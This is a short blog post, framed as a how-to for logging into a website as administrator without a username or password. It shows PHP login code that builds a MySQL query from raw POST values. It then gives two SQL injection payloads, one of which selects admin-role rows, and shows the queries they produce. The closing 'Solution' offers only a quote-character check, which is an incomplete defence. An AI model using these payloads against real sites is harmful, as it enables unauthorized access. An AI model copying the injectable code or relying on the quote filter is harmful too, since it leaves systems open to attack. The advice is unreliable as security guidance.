How to login as Administrator in website without having username and password

 
Method 1
 
If the PHP code in the login check page is like below
 
<?php
 
$username=$_POST['username'];
$password=$_POST['password'];
mysql_query("select * from user where username='$username' and password='$password' ");
 
?>
 
Then we can easily login to the system without having any username or password. Change the value of username and password so that it bypasses login check.
 
Put the value of username : test1 
Put the value of password  : test2' or '0'='0
 
Then the PHP code in the login check page will be changed to
 
<?php
 
$username=$_POST['username'];
$password=$_POST['password'];
mysql_query("select * from user where username='test1' and password='test2' or '0'='0' ");
 
?>
 
Then 0=0 will always return a true value. Then database returns the first row from the user table so we can login as the first user.


 
Method 2
 
To login as administrator then use the following code
 
Put the value of username : test1 
Put the value of password  : test2' or '0'='0' and role ='admin
 
Then the PHP code in the login check page will be changed to
 
<?php
 
$username=$_POST['username'];
$password=$_POST['password'];
mysql_query("select * from user where username='test1' and password='test2' or '0'='0' and role ='admin' ");
 
?>
 
Then 0=0 will always return a true value and role='admin' returns rows which having role as admin, so we can login as admin. 


 
Solution
 
Check the value of username and password and make sure that username and password don’t contain any single quote (‘) or double quote (“) characters.
 
or
 
Use the following check condition if(substr_count($username,"'") !=0) and if(substr_count($password,"'") !=0) in PHP and if any one condition satisfies then throws an error message.
 


You can leave a response, or trackback from your own site.

2 Responses to “How to login as Administrator in website without having username and password”

Leave a Reply